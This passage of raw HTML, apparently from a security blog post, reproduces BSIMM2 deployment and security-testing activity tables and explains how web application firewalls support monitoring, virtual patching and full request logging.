href="http://bsimm2.com/online/deployment/se/?s=se2.4#se2.4" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">protect apps (or parts of apps) that are published over trust boundaries</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.4#se2.4" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use code signing</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se3.2#se3.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE3.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se3.2#se3.2" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">protect IP and make exploit development harder</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se3.2#se3.2" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use code protection</a></td><td rowspan="1" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?l=3#3" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">3</a><div><br /></div></td></tr></tbody></table></span></div><div>Specifically, items SE1.1 and SE2.3 which specify the need to "watch software" in order to conduct application input monitoring and behavioral analysis are items where a WAF's automated learning/profiling can identify when there are deviations from normal user or application behavior.</div><div><br /></div><div>The <a href="http://bsimm2.com/online/deployment/cmvm/">Deployment: Configuration Management and Vulnerability Managemen</a>t section lists the following criteria:</div><div><br /></div><div><span class="Apple-style-span" style=" line-height: 20px; font-family:Cambria, 'Hoefler Text', Utopia, 'Liberation Serif', 'Nimbus Roman No9 L Regular', Times, 'Times New Roman', serif;font-size:15px;"><table cellspacing="0" cellpadding="0" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(102, 102, 102); border-right-color: rgb(102, 102, 102); border-bottom-color: rgb(102, 102, 102); border-left-color: rgb(102, 102, 102); width: 754px; margin-top: auto; margin-right: auto; margin-bottom: 25px; margin-left: auto; "><tbody><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th colspan="4" style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">DEPLOYMENT: CONFIGURATION MANAGEMENT AND VULNERABILITY MANAGEMENT<br />Patching and updating applications, version control, defect tracking and remediation, incident handling.</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); "> </th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Objective</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Activity</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Level</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.1#cmvm1.1" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM1.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.1#cmvm1.1" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">know what to do when something bad happens</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.1#cmvm1.1" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">create/interface with incident response</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?l=1#1" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">1</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.2#cmvm1.2" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM1.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.2#cmvm1.2" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">use ops data to change dev behavior</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.2#cmvm1.2" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">identify software bugs found in ops monitoring and feed back to dev</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.1#cmvm2.1" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM2.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.1#cmvm2.1" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">be able to fix apps when they are under direct attack</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.1#cmvm2.1" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">have emergency codebase response</a></td><td rowspan="3" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?l=2#2" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">2</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.2#cmvm2.2" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM2.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.2#cmvm2.2" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">use ops data to change dev behavior</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.2#cmvm2.2" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">track software bugs found during ops through the fix process</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.3#cmvm2.3" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM2.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.3#cmvm2.3" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">know where the code is</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.3#cmvm2.3" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">develop operations inventory of apps</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.1#cmvm3.1" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM3.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.1#cmvm3.1" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">learn from operational experience</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.1#cmvm3.1" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">fix all occurrences of software bugs from ops in the codebase (T: code review)</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?l=3#3" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">3</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.2#cmvm3.2" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM3.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.2#cmvm3.2" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">use ops data to change dev behavior</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.2#cmvm3.2" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">enhance dev processes (SSDL) to prevent cause of software bugs found in ops</a><div><br /></div></td></tr></tbody></table></span></div><div>This section highlights a number of critical deployment components where WAFs help an organization.</div><div><ul><li><b>CMVM2.1 - Be able to fix apps when they are under direct attack</b></li></ul></div><div>Being able to implement a quick response to mitigate a live attack is critical. Even if an organization has direct access to source code and developers, the process of getting fixes into production still takes a fair amount of time. WAFs can be used to quickly implement new policy settings to protect against these attacks until the source code fixes are live. Most people think of virtual patching here but this capability also extends to other types of attacks such as denial of service and brute force attacks.</div><div><ul><li><b>CMVM1.2 - Use ops data to change dev behavior</b></li></ul></div><div>Being able to capture the full request/response payloads when either attacks or application errors are identified is vitally important. The fact is that most web server and application logging is terrible and only logs a small subset of the actual data. Most logs do not log full inbound request headers and body payloads and almost none log the outbound data. This data is critical, not only for incident response to identify what data was leaked, but also for remediation efforts. I mean c'mon, how can we really expect web application developers to properly correct application defects when all you give them is a web server 1-line log entry in Common Log Format? That just is not enough data for them to recreate and test the payloads to correct the issue.</div><div><br /></div><div><b>SSDL Touchpoints: Security Testing</b></div><div>The <a href="http://bsimm2.com/online/ssdl/st/">Security Testing</a> section of BSIMM2 outlines the following:</div><div><br /></div><div><span class="Apple-style-span" style=" line-height: 20px; font-family:Cambria, 'Hoefler Text', Utopia, 'Liberation Serif', 'Nimbus Roman No9 L Regular', Times, 'Times New Roman', serif;font-size:15px;"><table cellspacing="0" cellpadding="0" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(102, 102, 102); border-right-color: rgb(102, 102, 102); border-bottom-color: rgb(102, 102, 102); border-left-color: rgb(102, 102, 102); width: 754px; margin-top: auto; margin-right: auto; margin-bottom: 25px; margin-left: auto; "><tbody><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th colspan="4" style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">SSDL TOUCHPOINTS: SECURITY TESTING<br />Use of black box security tools in QA, risk driven white box testing, application of the attack model, code coverage analysis.</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); "> </th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Objective</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Activity</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Level</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.1#st1.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">ST1.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.1#st1.1" style="color: rgb(16, 30, 171); display: block; width: 268px; text-decoration: none; ">execute adversarial tests beyond functional</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?s=st1.1#st1.1" style="color: rgb(16, 30, 171); display: block; width: 388px; text-decoration: none; ">ensure QA supports edge/boundary value condition testing</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/ssdl/st/?l=1#1" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">1</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); 